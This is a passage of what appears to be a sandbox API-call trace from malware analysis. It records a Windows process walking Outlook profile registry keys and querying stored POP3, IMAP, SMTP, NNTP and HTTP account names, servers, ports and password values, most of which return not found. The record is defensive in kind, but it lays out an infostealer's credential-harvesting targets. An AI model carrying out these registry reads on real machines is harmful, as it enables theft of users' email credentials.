phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.287] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] LocalReAlloc (hMem=0xd211f80, uBytes=0x5e, uFlags=0x2) returned 0xd211f80 [0249.287] ISequentialStream:RemoteWrite (in: This=0xd1ee010, pv=0xd211f80*=0x53, cb=0x54, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0249.287] LocalFree (hMem=0xd211f80) returned 0x0 [0249.287] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x1c4de40 | out: phkResult=0x1c4de40*=0x948) returned 0x0 [0249.287] RegEnumKeyExA (in: hKey=0x948, dwIndex=0x0, lpName=0x1c4de50, lpcchName=0x1c4e678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4e678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] LocalFree (hMem=0xd19a470) returned 0x0 [0249.287] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x2, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.287] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0249.287] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0xd199b10 [0249.287] wsprintfA (in: param_1=0xd199b10, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0249.287] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.287] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.287] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.287] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.287] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.287] RegCloseKey (hKey=0x948) returned 0x0 [0249.287] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.288] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.288] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.288] RegCloseKey (hKey=0x948) returned 0x0 [0249.289] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.289] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.289] RegCloseKey (hKey=0x948) returned 0x0 [0249.289] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.289] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.289] RegCloseKey (hKey=0x948) returned 0x0 [0249.289] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.289] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.289] RegCloseKey (hKey=0x948) returned 0x0 [0249.289] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.289] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.289] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.290] RegCloseKey (hKey=0x948) returned 0x0 [0249.290] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.290] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.291] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.291] RegCloseKey (hKey=0x948) returned 0x0 [0249.291] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 [0249.292] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.292] RegQueryValueExA (in: hKey=0x948, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.292] RegCloseKey (hKey=0x948) returned 0x0 